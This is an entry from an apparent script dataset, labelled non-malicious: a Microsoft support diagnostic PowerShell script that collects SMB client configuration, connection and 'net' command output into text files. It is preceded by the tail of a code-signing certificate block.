KDAmMCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5jb21vZG9jYS5jb20wDQYJKoZI # hvcNAQEMBQADggEBABK/oe+LdJqYRLhpRrWrJAoMpIpnuDqBv0WKfVIHqI0fTiGF # OaNrXi0ghr8QuK55O1PNtPvYRL4G2VxjZ9RAFodEhnIq1jIV9RKDwvnhXRFAZ/ZC # J3LFI+ICOBpMIOLbAffNRk8monxmwFE2tokCVMf8WPtsAO7+mKYulaEMUykfb9gZ # pk+e96wJ6l2CxouvgKe9gUhShDHaMuwV5KZMPWw5c9QLhTkg4IUaaOGnSDip0TYl # d8GNGRbFiExmfS9jzpjoad+sPKhdnckcW67Y8y90z7h+9teDnRGWYpquRRPaf9xH # +9/DUp/mBlXpnYzyOmJRvOwkDynUWICE5EV7WtgwggYcMIIEBKADAgECAhAz1wio # kUBTGeKlu9M5ua1uMA0GCSqGSIb3DQEBDAUAMFYxCzAJBgNVBAYTAkdCMRgwFgYD # VQQKEw9TZWN0aWdvIExpbWl0ZWQxLTArBgNVBAMTJFNlY3RpZ28gUHVibGljIENv # ZGUgU2lnbmluZyBSb290IFI0NjAeFw0yMTAzMjIwMDAwMDBaFw0zNjAzMjEyMzU5 # NTlaMFcxCzAJBgNVBAYTAkdCMRgwFgYDVQQKEw9TZWN0aWdvIExpbWl0ZWQxLjAs # BgNVBAMTJVNlY3RpZ28gUHVibGljIENvZGUgU2lnbmluZyBDQSBFViBSMzYwggGi # MA0GCSqGSIb3DQEBAQUAA4IBjwAwggGKAoIBgQC70f4et0JbePWQp64sg/GNIdMw # hoV739PN2RZLrIXFuwHP4owoEXIEdiyBxasSekBKxRDogRQ5G19PB/YwMDB/NSXl # wHM9QAmU6Kj46zkLVdW2DIseJ/jePiLBv+9l7nPuZd0o3bsffZsyf7eZVReqskmo # PBBqOsMhspmoQ9c7gqgZYbU+alpduLyeE9AKnvVbj2k4aOqlH1vKI+4L7bzQHkND # brBTjMJzKkQxbr6PuMYC9ruCBBV5DFIg6JgncWHvL+T4AvszWbX0w1Xn3/YIIq62 # 0QlZ7AGfc4m3Q0/V8tm9VlkJ3bcX9sR0gLqHRqwG29sEDdVOuu6MCTQZlRvmcBME # Jd+PuNeEM4xspgzraLqVT3xE6NRpjSV5wyHxNXf4T7YSVZXQVugYAtXueciGoWnx # G06UE2oHYvDQa5mll1CeHDOhHu5hiwVoHI717iaQg9b+cYWnmvINFD42tRKtd3V6 # zOdGNmqQU8vGlHHeBzoh+dYyZ+CcblSGoGSgg8sCAwEAAaOCAWMwggFfMB8GA1Ud # IwQYMBaAFDLrkpr/NZZILyhAQnAgNpFcF4XmMB0GA1UdDgQWBBSBMpJBKyjNRsjE # osYqORLsSKk/FDAOBgNVHQ8BAf8EBAMCAYYwEgYDVR0TAQH/BAgwBgEB/wIBADAT # BgNVHSUEDDAKBggrBgEFBQcDAzAaBgNVHSAEEzARMAYGBFUdIAAwBwYFZ4EMAQMw # SwYDVR0fBEQwQjBAoD6gPIY6aHR0cDovL2NybC5zZWN0aWdvLmNvbS9TZWN0aWdv # UHVibGljQ29kZVNpZ25pbmdSb290UjQ2LmNybDB7BggrBgEFBQcBAQRvMG0wRgYI # KwYBBQUHMAKGOmh0dHA6Ly9jcnQuc2VjdGlnby5jb20vU2VjdGlnb1B1YmxpY0Nv # ZGVTaWduaW5nUm9vdFI0Ni5wN2MwIwYIKwYBBQUHMAGGF2h0dHA6Ly9vY3NwLnNl # Y3RpZ28uY29tMA0GCSqGSIb3DQEBDAUAA4ICAQBfNqz7+fZyWhS38Asd3tj9lwHS # /QHumS2G6Pa38Dn/1oFKWqdCSgotFZ3mlP3FaUqy10vxFhJM9r6QZmWLLXTUqwj3 # ahEDCHd8vmnhsNufJIkD1t5cpOCy1rTP4zjVuW3MJ9bOZBHoEHJ20/ng6SyJ6UnT # s5eWBgrh9grIQZqRXYHYNneYyoBBl6j4kT9jn6rNVFRLgOr1F2bTlHH9nv1HMePp # GoYd074g0j+xUl+yk72MlQmYco+VAfSYQ6VK+xQmqp02v3Kw/Ny9hA3s7TSoXpUr # OBZjBXXZ9jEuFWvilLIq0nQ1tZiao/74Ky+2F0snbFrmuXZe2obdq2TWauqDGIgb # MYL1iLOUJcAhLwhpAuNMu0wqETDrgXkG4UGVKtQg9guT5Hx2DJ0dJmtfhAH2KpnN # r97H8OQYok6bLyoMZqaSdSa+2UA1E2+upjcaeuitHFFjBypWBmztfhj24+xkc6Zt # CDaLrw+ZrnVrFyvCTWrDUUZBVumPwo3/E3Gb2u2e05+r5UWmEsUUWlJBl6MGAAjF # 5hzqJ4I8O9vmRsTvLQA1E802fZ3lqicIBczOwDYOSxlP0GOabb/FKVMxItt1UHeG # 0PL4au5rBhs+hSMrl8h+eplBDN1Yfw6owxI9OjWb4J0sjBeBVESoeh2YnZZ/WVim # VGX/UUIL+Efrz/jlvzCCBlswggTDoAMCAQICEDB3Np9sRenync55S1/V2zEwDQYJ # KoZIhvcNAQELBQAwVzELMAkGA1UEBhMCR0IxGDAWBgNVBAoTD1NlY3RpZ28gTGlt # aXRlZDEuMCwGA1UEAxMlU2VjdGlnbyBQdWJsaWMgQ29kZSBTaWduaW5nIENBIEVW # IFIzNjAeFw0yNDAxMTYwMDAwMDBaFw0yNTAxMTUyMzU5NTlaMIG7MRAwDgYDVQQF # EwcyMTg5MDc0MRMwEQYLKwYBBAGCNzwCAQMTAlVTMRkwFwYLKwYBBAGCNzwCAQIT # CERlbGF3YXJlMR0wGwYDVQQPExRQcml2YXRlIE9yZ2FuaXphdGlvbjELMAkGA1UE # BhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExGjAYBgNVBAoMEUludGVsIENvcnBv # cmF0aW9uMRowGAYDVQQDDBFJbnRlbCBDb3Jwb3JhdGlvbjCCAaIwDQYJKoZIhvcN # AQEBBQADggGPADCCAYoCggGBALUx6h43Sbt+ZfuTa/V0GFWgAAfUIWg9ruenPoc8 # FTqJxPdbqYRlGKEK2vCSQyBTn7tGV54Y/hMGvRTBQce4dMFe7R5wL9p92J3R4jkR # MadZxJ4HuWalG13CpjQZP1Jg61Wx0KjsCPd2VdbBTpTiLRI+PKjokE6I/TLuA2bA # tqy1phe2/82SRlx/fVGuIzI1BOQCaC9Olao3kJ9JwKt6VZidIgmzXAYLpzZ2VhW9 # HTRLaqTLTKxgO2mtpMTbfqc7RR/oYHG2cbGCoW3KB5Tlgjhm85ZsMEMV48O7JWeB # wQoNy9admwqsdUzr5HdDbM7/EuiNHvP+sIauOmHEkLtqxM37sSgDBQX3V+vqiR5b # H6xTcfIceaa4ukwKuVmfWrB35TGSEkWFzZu3ZUYGKRCI9WZ8GixV/5PHm571xSrD # jbrigtkHtPahVVC8EUojnIGiDXovnm7ZG0FEXKuVybNOSpD3BzE2Pw3j/evKHuIr # hWCzdPBOkbbEoYFBxts6UtJNFwIDAQABo4IBvDCCAbgwHwYDVR0jBBgwFoAUgTKS # QSsozUbIxKLGKjkS7EipPxQwHQYDVR0OBBYEFKRLkSq7xH/Ru5kWUgmDt9ZZsJHj # MA4GA1UdDwEB/wQEAwIHgDAMBgNVHRMBAf8EAjAAMBMGA1UdJQQMMAoGCCsGAQUF # BwMDMEkGA1UdIARCMEAwNQYMKwYBBAGyMQECAQYBMCUwIwYIKwYBBQUHAgEWF2h0 # dHBzOi8vc2VjdGlnby5jb20vQ1BTMAcGBWeBDAEDMEsGA1UdHwREMEIwQKA+oDyG # Omh0dHA6Ly9jcmwuc2VjdGlnby5jb20vU2VjdGlnb1B1YmxpY0NvZGVTaWduaW5n # Q0FFVlIzNi5jcmwwewYIKwYBBQUHAQEEbzBtMEYGCCsGAQUFBzAChjpodHRwOi8v # Y3J0LnNlY3RpZ28uY29tL1NlY3RpZ29QdWJsaWNDb2RlU2lnbmluZ0NBRVZSMzYu # Y3J0MCMGCCsGAQUFBzABhhdodHRwOi8vb2NzcC5zZWN0aWdvLmNvbTAuBgNVHREE # JzAloCMGCCsGAQUFBwgDoBcwFQwTVVMtREVMQVdBUkUtMjE4OTA3NDANBgkqhkiG # 9w0BAQsFAAOCAYEAI6NvLiKQmXol9qHiDAxrF41RjhawR5g4ZQuWIxU2uMkjL9Eh # NV16cKJjZ+KSPebFErInVlf/NLvKCfSUpf+2olf7Phu1pbb2p2R1mFtGYIA1Bcwa # UmIsA/XsQ+ZHYlVdqBcpJCdc/jTzfAQen0gv1hFOIfk0vOKjjAAuTIgQNkG3c5Sw # FMZjhu+wrSXx9Qvv85BhIX/xF1xYkKN4iBwqqebxAhmaE2tZUI7X/kKDx9QexONP # Wo5Vw9b3P9I9pP8pWS/Txa4AC8x5AcZ8f6FUkl5Y750Ma6XEeHJZlUGkf1d/Ph9M # c6bg5/P4wuXceTd4iqu3sK4ZxbiXWiFD+PtZ9UbzDarUNCqskSwudIzEcgwt7glZ # YUNC+gD64uddohltoXXIasQNs/LK+qzOuqZKhFkRf+v4+Q28EQYuVIcJDHspW1CV # k3Y4zhEb1dhCAPZ9jyXyz827Uji6HD5dnGO2lPCcEvM/aWEjYYM285g0CZix3LeB # XQydSyjK95klPc99MYIV1TCCFdECAQEwazBXMQswCQYDVQQGEwJHQjEYMBYGA1UE # ChMPU2VjdGlnbyBMaW1pdGVkMS4wLAYDVQQDEyVTZWN0aWdvIFB1YmxpYyBDb2Rl # IFNpZ25pbmcgQ0EgRVYgUjM2AhAwdzafbEXp8p3OeUtf1dsxMA0GCWCGSAFlAwQC # AQUAoGowGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARYwLwYJKoZIhvcNAQkEMSIEIMjIQRxcpfJhSpwoVocMxvnr # z62LiXT7IUQ/DnDGqETTMA0GCSqGSIb3DQEBAQUABIIBgCOWlnmmzN+8pO8B/jzJ # fQIYgC4uEVUNF4Jdgu+OaiKZRUL4DZQn2cWcygHmwZQODSkCCOETMf+tSHHBrgoD # Oy/daH8kAzc6MxgsN7gZTPfUUOyaFH+SNhuqvxd5eGTi9ytrg9Y3Ah+V3wWP2CjP # ghUkIA36d9apGICRRIzIWRoElxr0EFN4RMpr1vLGxT39IUQXeI+xuf72e9TvZ6ID # +40UjpiW0Byp3Oud85pVUucwr+lbVmbwx1JwpwOHgjPQo3EScI/TZIdGNOv6vJsb # 4SPjMJDOKWne10HPppo3yZpg6r5cPumQ7b/FTioDYTgGMCk/MWoNqEvzA5wWi5VT # U2OT0wWurammJ1KRlwvLKA2R/J83odIDZxWz2qjcQZSBiqnJMC7+XEDw0czFogSa # cDUtND1h6CvAotCWkm/40ilf3T6ISPTyyiZApVihSwf5sja1cXG7kUksxW7IM0bP # 8+cmGqwzPj3WV1YWby7pYxNs0oWqh+C/uhQ/KXPKPnmeW6GCE08wghNLBgorBgEE # AYI3AwMBMYITOzCCEzcGCSqGSIb3DQEHAqCCEygwghMkAgEDMQ8wDQYJYIZIAWUD # BAICBQAwgfAGCyqGSIb3DQEJEAEEoIHgBIHdMIHaAgEBBgorBgEEAbIxAgEBMDEw # DQYJYIZIAWUDBAIBBQAEIGqeQbcO//4yG+csJxKpJI/6Axt6LYtT/BsZ1mReauiH # AhUAr69rs/uEX8PziHAN330DvGu1JDkYDzIwMjQwMTI0MTAxNDEzWqBupGwwajEL # MAkGA1UEBhMCR0IxEzARBgNVBAgTCk1hbmNoZXN0ZXIxGDAWBgNVBAoTD1NlY3Rp # Z28gTGltaXRlZDEsMCoGA1UEAwwjU2VjdGlnbyBSU0EgVGltZSBTdGFtcGluZyBT # aWduZXIgIzSggg3pMIIG9TCCBN2gAwIBAgIQOUwl4XygbSeoZeI72R0i1DANBgkq # hkiG9w0BAQwFADB9MQswCQYDVQQGEwJHQjEbMBkGA1UECBMSR3JlYXRlciBNYW5j # aGVzdGVyMRAwDgYDVQQHEwdTYWxmb3JkMRgwFgYDVQQKEw9TZWN0aWdvIExpbWl0 # ZWQxJTAjBgNVBAMTHFNlY3RpZ28gUlNBIFRpbWUgU3RhbXBpbmcgQ0EwHhcNMjMw # NTAzMDAwMDAwWhcNMzQwODAyMjM1OTU5WjBqMQswCQYDVQQGEwJHQjETMBEGA1UE # CBMKTWFuY2hlc3RlcjEYMBYGA1UEChMPU2VjdGlnbyBMaW1pdGVkMSwwKgYDVQQD # DCNTZWN0aWdvIFJTQSBUaW1lIFN0YW1waW5nIFNpZ25lciAjNDCCAiIwDQYJKoZI # hvcNAQEBBQADggIPADCCAgoCggIBAKSTKFJLzyeHdqQpHJk4wOcO1NEc7GjLAWTk # is13sHFlgryf/Iu7u5WY+yURjlqICWYRFFiyuiJb5vYy8V0twHqiDuDgVmTtoeWB # IHIgZEFsx8MI+vN9Xe8hmsJ+1yzDuhGYHvzTIAhCs1+/f4hYMqsws9iMepZKGRNc # rPznq+kcFi6wsDiVSs+FUKtnAyWhuzjpD2+pWpqRKBM1uR/zPeEkyGuxmegN77tN # 5T2MVAOR0Pwtz1UzOHoJHAfRIuBjhqe+/dKDcxIUm5pMCUa9NLzhS1B7cuBb/Rm7 # HzxqGXtuuy1EKr48TMysigSTxleGoHM2K4GX+hubfoiH2FJ5if5udzfXu1Cf+hgl # TxPyXnypsSBaKaujQod34PRMAkjdWKVTpqOg7RmWZRUpxe0zMCXmloOBmvZgZpBY # B4DNQnWs+7SR0MXdAUBqtqgQ7vaNereeda/TpUsYoQyfV7BeJUeRdM11EtGcb+Re # DZvsdSbu/tP1ki9ShejaRFEqoswAyodmQ6MbAO+itZadYq0nC/IbSsnDlEI3iCCE # qIeuw7ojcnv4VO/4ayewhfWnQ4XYKzl021p3AtGk+vXNnD3MH65R0Hts2B0tEUJT # cXTC5TWqLVIS2SXP8NPQkUMS1zJ9mGzjd0HI/x8kVO9urcY+VXvxXIc6ZPFgSwVP # 77kv7AkTAgMBAAGjggGCMIIBfjAfBgNVHSMEGDAWgBQaofhhGSAPw0F3RSiO0TVf # BhIEVTAdBgNVHQ4EFgQUAw8xyJEqk71j89FdTaQ0D9KVARgwDgYDVR0PAQH/BAQD # AgbAMAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwSgYDVR0g # BEMwQTA1BgwrBgEEAbIxAQIBAwgwJTAjBggrBgEFBQcCARYXaHR0cHM6Ly9zZWN0 # aWdvLmNvbS9DUFMwCAYGZ4EMAQQCMEQGA1UdHwQ9MDswOaA3oDWGM2h0dHA6Ly9j # cmwuc2VjdGlnby5jb20vU2VjdGlnb1JTQVRpbWVTdGFtcGluZ0NBLmNybDB0Bggr # BgEFBQcBAQRoMGYwPwYIKwYBBQUHMAKGM2h0dHA6Ly9jcnQuc2VjdGlnby5jb20v # U2VjdGlnb1JTQVRpbWVTdGFtcGluZ0NBLmNydDAjBggrBgEFBQcwAYYXaHR0cDov # L29jc3Auc2VjdGlnby5jb20wDQYJKoZIhvcNAQEMBQADggIBAEybZVj64HnP7xXD # Mm3eM5Hrd1ji673LSjx13n6UbcMixwSV32VpYRMM9gye9YkgXsGHxwMkysel8Cbf # +PgxZQ3g621RV6aMhFIIRhwqwt7y2opF87739i7Efu347Wi/elZI6WHlmjl3vL66 # kWSIdf9dhRY0J9Ipy//tLdr/vpMM7G2iDczD8W69IZEaIwBSrZfUYngqhHmo1z2s # IY9wwyR5OpfxDaOjW1PYqwC6WPs1gE9fKHFsGV7Cg3KQruDG2PKZ++q0kmV8B3w1 # RB2tWBhrYvvebMQKqWzTIUZw3C+NdUwjwkHQepY7w0vdzZImdHZcN6CaJJ5OX07T # jw/lE09ZRGVLQ2TPSPhnZ7lNv8wNsTow0KE9SK16ZeTs3+AB8LMqSjmswaT5qX01 # 0DJAoLEZKhghssh9BXEaSyc2quCYHIN158d+S4RDzUP7kJd2KhKsQMFwW5kKQPqA # bZRhe8huuchnZyRcUI0BIN4H9wHU+C4RzZ2D5fjKJRxEPSflsIZHKgsbhHZ9e2hP # jbf3E7TtoC3ucw/ZELqdmSx813UfjxDElOZ+JOWVSoiMJ9aFZh35rmR2kehI/shV # Cu0pwx/eOKbAFPsyPfipg2I2yMO+AIccq/pKQhyJA9z1XHxw2V14Tu6fXiDmCWp8 # KwijSPUV/ARP380hHHrl9Y4a1LlAMIIG7DCCBNSgAwIBAgIQMA9vrN1mmHR8qUY2 # p3gtuTANBgkqhkiG9w0BAQwFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCk5l # dyBKZXJzZXkxFDASBgNVBAcTC0plcnNleSBDaXR5MR4wHAYDVQQKExVUaGUgVVNF # UlRSVVNUIE5ldHdvcmsxLjAsBgNVBAMTJVVTRVJUcnVzdCBSU0EgQ2VydGlmaWNh # dGlvbiBBdXRob3JpdHkwHhcNMTkwNTAyMDAwMDAwWhcNMzgwMTE4MjM1OTU5WjB9 # MQswCQYDVQQGEwJHQjEbMBkGA1UECBMSR3JlYXRlciBNYW5jaGVzdGVyMRAwDgYD # VQQHEwdTYWxmb3JkMRgwFgYDVQQKEw9TZWN0aWdvIExpbWl0ZWQxJTAjBgNVBAMT # HFNlY3RpZ28gUlNBIFRpbWUgU3RhbXBpbmcgQ0EwggIiMA0GCSqGSIb3DQEBAQUA # A4ICDwAwggIKAoICAQDIGwGv2Sx+iJl9AZg/IJC9nIAhVJO5z6A+U++zWsB21hoE # pc5Hg7XrxMxJNMvzRWW5+adkFiYJ+9UyUnkuyWPCE5u2hj8BBZJmbyGr1XEQeYf0 # RirNxFrJ29ddSU1yVg/cyeNTmDoqHvzOWEnTv/M5u7mkI0Ks0BXDf56iXNc48Ray # cNOjxN+zxXKsLgp3/A2UUrf8H5VzJD0BKLwPDU+zkQGObp0ndVXRFzs0IXuXAZSv # f4DP0REKV4TJf1bgvUacgr6Unb+0ILBgfrhN9Q0/29DqhYyKVnHRLZRMyIw80xSi # nL0m/9NTIMdgaZtYClT0Bef9Maz5yIUXx7gpGaQpL0bj3duRX58/Nj4OMGcrRrc1 # r5a+2kxgzKi7nw0U1BjEMJh0giHPYla1IXMSHv2qyghYh3ekFesZVf/QOVQtJu5F # GjpvzdeE8NfwKMVPZIMC1Pvi3vG8Aij0bdonigbSlofe6GsO8Ft96XZpkyAcSpcs # dxkrk5WYnJee647BeFbGRCXfBhKaBi2fA179g6JTZ8qx+o2hZMmIklnLqEbAyfKm # /31X2xJ2+opBJNQb/HKlFKLUrUMcpEmLQTkUAx4p+hulIq6lw02C0I3aa7fb9xhA # V3PwcaP7Sn1FNsH3jYL6uckNU4B9+rY5WDLvbxhQiddPnTO9GrWdod6VQXqngwID # AQABo4IBWjCCAVYwHwYDVR0jBBgwFoAUU3m/WqorSs9UgOHYm8Cd8rIDZsswHQYD # VR0OBBYEFBqh+GEZIA/DQXdFKI7RNV8GEgRVMA4GA1UdDwEB/wQEAwIBhjASBgNV # HRMBAf8ECDAGAQH/AgEAMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBEGA1UdIAQKMAgw # BgYEVR0gADBQBgNVHR8ESTBHMEWgQ6BBhj9odHRwOi8vY3JsLnVzZXJ0cnVzdC5j # b20vVVNFUlRydXN0UlNBQ2VydGlmaWNhdGlvbkF1dGhvcml0eS5jcmwwdgYIKwYB # BQUHAQEEajBoMD8GCCsGAQUFBzAChjNodHRwOi8vY3J0LnVzZXJ0cnVzdC5jb20v # VVNFUlRydXN0UlNBQWRkVHJ1c3RDQS5jcnQwJQYIKwYBBQUHMAGGGWh0dHA6Ly9v # Y3NwLnVzZXJ0cnVzdC5jb20wDQYJKoZIhvcNAQEMBQADggIBAG1UgaUzXRbhtVOB # kXXfA3oyCy0lhBGysNsqfSoF9bw7J/RaoLlJWZApbGHLtVDb4n35nwDvQMOt0+Lk # VvlYQc/xQuUQff+wdB+PxlwJ+TNe6qAcJlhc87QRD9XVw+K81Vh4v0h24URnbY+w # QxAPjeT5OGK/EwHFhaNMxcyyUzCVpNb0llYIuM1cfwGWvnJSajtCN3wWeDmTk5Sb # sdyybUFtZ83Jb5A9f0VywRsj1sJVhGbks8VmBvbz1kteraMrQoohkv6ob1olcGKB # c2NeoLvY3NdK0z2vgwY4Eh0khy3k/ALWPncEvAQ2ted3y5wujSMYuaPCRx3wXdah # c1cFaJqnyTdlHb7qvNhCg0MFpYumCf/RoZSmTqo9CfUFbLfSZFrYKiLCS53xOV5M # 3kg9mzSWmglfjv33sVKRzj+J9hyhtal1H3G/W0NdZT1QgW6r8NDT/LKzH7aZlib0 # PHmLXGTMze4nmuWgwAxyh8FuTVrTHurwROYybxzrF06Uw3hlIDsPQaof6aFBnf6x # uKBlKjTg3qj5PObBMLvAoGMs/FwWAKjQxH/qEZ0eBsambTJdtDgJK0kHqv3sMNrx # py/Pt/360KOE2See+wFmd7lWEOEgbsausfm2usg1XTN2jvF8IAwqd661ogKGuinu # tFoAsYyr4/kKyVRd1LlqdJ69SK6YMYIELDCCBCgCAQEwgZEwfTELMAkGA1UEBhMC # R0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UEBxMHU2FsZm9y # ZDEYMBYGA1UEChMPU2VjdGlnbyBMaW1pdGVkMSUwIwYDVQQDExxTZWN0aWdvIFJT # QSBUaW1lIFN0YW1waW5nIENBAhA5TCXhfKBtJ6hl4jvZHSLUMA0GCWCGSAFlAwQC # AgUAoIIBazAaBgkqhkiG9w0BCQMxDQYLKoZIhvcNAQkQAQQwHAYJKoZIhvcNAQkF # MQ8XDTI0MDEyNDEwMTQxM1owPwYJKoZIhvcNAQkEMTIEMI4eNDSTdmLrda8+yLWv # nrEo6zPiCfw1ZKjVOQxihx0uhrp3Q1ElewCXL0BZHjY4zzCB7QYLKoZIhvcNAQkQ # Agwxgd0wgdowgdcwFgQUrmKvdQoMvUfWRh91aOK8jOfKT5QwgbwEFALWW5Xig3DB # VwCV+oj5I92Tf62PMIGjMIGOpIGLMIGIMQswCQYDVQQGEwJVUzETMBEGA1UECBMK # TmV3IEplcnNleTEUMBIGA1UEBxMLSmVyc2V5IENpdHkxHjAcBgNVBAoTFVRoZSBV # U0VSVFJVU1QgTmV0d29yazEuMCwGA1UEAxMlVVNFUlRydXN0IFJTQSBDZXJ0aWZp # Y2F0aW9uIEF1dGhvcml0eQIQMA9vrN1mmHR8qUY2p3gtuTANBgkqhkiG9w0BAQEF # AASCAgCUb+HtdUFND6vYI1XTEbudFxoCKP5trqH9nCdshAhEt8uEoLjXINVxDeNK # MF7unnfxAuO0Vv8dw6ntPKrQi1hqof63B6/4ZhFwuaQjj/CTLPkapeLW30fbUtIJ # ntbbPbTat1RWeFRbVNUf5AdvE3UbQQuX7s3U1YsD1JGlmLoI0wkx07r8Lqi0Q3K7 # tkvNjzZqP3UlsnyaMHRjWmvAqCxUo9/43zk/77OCPPimsDJKU/mVipQD4qIE6bSs # t/PeN02WUiVT+K3OzScC/2UUbzhjSVPvG0o/XMfSnPEDLLVQBYa8LWGtlH6353ue # izs3/5Zp8Gj5H0ndf+3tdmTNF1OR/y7WU+mtXb2S5qYlpJfHp5saCYGkZ7oy7LEK # /pqEb6VSCOqTQUEnFFJuGxeARD9gVH/+1SPAsid5SrfP5yUj7ZPa9/Thv5RR9Pyw # 9xTabGdd6Rr5CUVqxke5ZX+AjVJK/hAMrpLEAmo1ogFiYhv0AFqayKAIWaz2Wh8J # 3e0HxAHcjlUllS2nA7rOBUgRxfKOeoaKIwU2AWvx4Irll67ptYq+obLUnVu98rbe # lterbhUNgfK6Y0AKleluDEKs8fxpIshZNXWbAR0adGdCS/8AxpW0DMe9S0IVFgIK # TS4GPdGXS1us2gjzsUUEtVQNYsI/hLEvmhal/rjOBz9AUvNEEQ== # SIG # End signature block
combined_dataset/train/non-malicious/sample_2_29.ps1
sample_2_29.ps1
#************************************************ # DC_SmbClient-Component.ps1 # Version 1.1 # Date: 2009-2019 # Author: Boyd Benson (bbenson@microsoft.com) +WalterE # Description: Collects information about the SMB Client. # Called from: Main Networking Diag, etc. #******************************************************* Trap [Exception] { # Handle exception and throw it to the stdout log file. Then continue with function and script. $Script:ExceptionMessage = $_ "[info]: Exception occurred." | WriteTo-StdOut "[info]: Exception.Message $ExceptionMessage." | WriteTo-StdOut $Error.Clear() continue # later use return to return the exception message to an object: return $Script:ExceptionMessage } Import-LocalizedData -BindingVariable ScriptVariable Write-DiagProgress -Activity $ScriptVariable.ID_CTSSMBClient -Status $ScriptVariable.ID_CTSSMBClientDescription function RunNet ([string]$NetCommandToExecute="") { Write-DiagProgress -Activity $ScriptVariable.ID_CTSSMBClient -Status "net $NetCommandToExecute" $NetCommandToExecuteLength = $NetCommandToExecute.Length + 6 "`n`n`n" + "=" * ($NetCommandToExecuteLength) + "`r`n" + "net $NetCommandToExecute" + "`r`n" + "=" * ($NetCommandToExecuteLength) | Out-File -FilePath $OutputFile -append $CommandToExecute = "cmd.exe /c net.exe " + $NetCommandToExecute + " >> $OutputFile " RunCmD -commandToRun $CommandToExecute -CollectFiles $false "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append } function RunPS ([string]$RunPScmd="", [switch]$ft) { $RunPScmdLength = $RunPScmd.Length "-" * ($RunPScmdLength) | Out-File -FilePath $OutputFile -append "$RunPScmd" | Out-File -FilePath $OutputFile -append "-" * ($RunPScmdLength) | Out-File -FilePath $OutputFile -append if ($ft) { # This format-table expression is useful to make sure that wide ft output works correctly Invoke-Expression $RunPScmd |format-table -autosize -outvariable $FormatTableTempVar | Out-File -FilePath $outputFile -Width 500 -append } else { Invoke-Expression $RunPScmd | Out-File -FilePath $OutputFile -append } "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append } $sectionDescription = "SMB Client" #----------W8/WS2012 powershell cmdlets # detect OS version and SKU $wmiOSVersion = Get-CimInstance -Namespace "root\cimv2" -Class Win32_OperatingSystem [int]$bn = [int]$wmiOSVersion.BuildNumber $outputFile= $Computername + "_SmbClient_info_pscmdlets.TXT" "====================================================" | Out-File -FilePath $OutputFile -append "SMB Client Powershell Cmdlets" | Out-File -FilePath $OutputFile -append "====================================================" | Out-File -FilePath $OutputFile -append "Overview" | Out-File -FilePath $OutputFile -append "----------------------------------------------------" | Out-File -FilePath $OutputFile -append " 1. Get-SmbMapping" | Out-File -FilePath $OutputFile -append " 2. Get-SmbClientConfiguration" | Out-File -FilePath $OutputFile -append " 3. Get-SmbClientNetworkInterface" | Out-File -FilePath $OutputFile -append " 4a. Get-SmbConnection" | Out-File -FilePath $OutputFile -append " 4b. Get-SmbConnection | fl *" | Out-File -FilePath $OutputFile -append " 5. Get-SmbMultichannelConnection" | Out-File -FilePath $OutputFile -append " 6. Get-SmbMultichannelConstraint" | Out-File -FilePath $OutputFile -append "====================================================" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append $smbClientServiceStatus = get-service * | Where-Object {$_.name -eq "lanmanworkstation"} if ($null -ne $smbClientServiceStatus) { if ((Get-Service "lanmanworkstation").Status -eq 'Running') { if ($bn -ge 9200) { # Reference: # The basics of SMB PowerShell, a feature of Windows Server 2012 and SMB 3.0 # http://blogs.technet.com/b/josebda/archive/2012/06/27/the-basics-of-smb-powershell-a-feature-of-windows-server-2012-and-smb-3-0.aspx RunPS "Get-SmbMapping" -ft # W8/WS2012, W8.1/WS2012R2 #default <unknown> RunPS "Get-SmbClientConfiguration" # W8/WS2012, W8.1/WS2012R2 # defaults to fl RunPS "Get-SmbClientNetworkInterface" -ft # W8/WS2012, W8.1/WS2012R2 # defaults to ft RunPS "Get-SmbConnection" -ft # W8/WS2012, W8.1/WS2012R2 # defaults to ft RunPS "Get-SmbConnection | fl *" # W8/WS2012, W8.1/WS2012R2 # RunPS "Get-SmbMultichannelConnection" -ft # W8/WS2012, W8.1/WS2012R2 # defaults to ft # run on both client and server RunPS "Get-SmbMultichannelConstraint" # W8/WS2012, W8.1/WS2012R2 # defaults to <unknown> # run on both client and server } } else { "The `"Workstation`" service is not running. Not running pscmdlets." | Out-File -FilePath $OutputFile -append } } else { "The `"Workstation`" service does not exist. Not running ps cmdlets." | Out-File -FilePath $OutputFile -append } CollectFiles -filesToCollect $OutputFile -fileDescription "SMB Client Information from Powershell cmdlets" -SectionDescription $sectionDescription #----------Net Commands $OutputFile= $Computername + "_SmbClient_info_net.TXT" "====================================================" | Out-File -FilePath $OutputFile -append "SMB Client Netsh Commands" | Out-File -FilePath $OutputFile -append "====================================================" | Out-File -FilePath $OutputFile -append "Overview" | Out-File -FilePath $OutputFile -append "----------------------------------------------------" | Out-File -FilePath $OutputFile -append " 1. net config workstation" | Out-File -FilePath $OutputFile -append " 2. net statistics workstation" | Out-File -FilePath $OutputFile -append " 3. net use" | Out-File -FilePath $OutputFile -append " 4. net accounts" | Out-File -FilePath $OutputFile -append "====================================================" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append $smbClientServiceStatus = get-service * | Where-Object {$_.name -eq "lanmanworkstation"} if ($null -ne $smbClientServiceStatus) { if ((Get-Service "lanmanworkstation").Status -eq 'Running') { RunNet "config workstation" RunNet "statistics workstation" } else { "The `"Workstation`" service is not running. Not running pscmdlets." | Out-File -FilePath $OutputFile -append } } else { "The `"Workstation`" service does not exist. Not running ps cmdlets." | Out-File -FilePath $OutputFile -append } RunNet "use" RunNet "accounts" 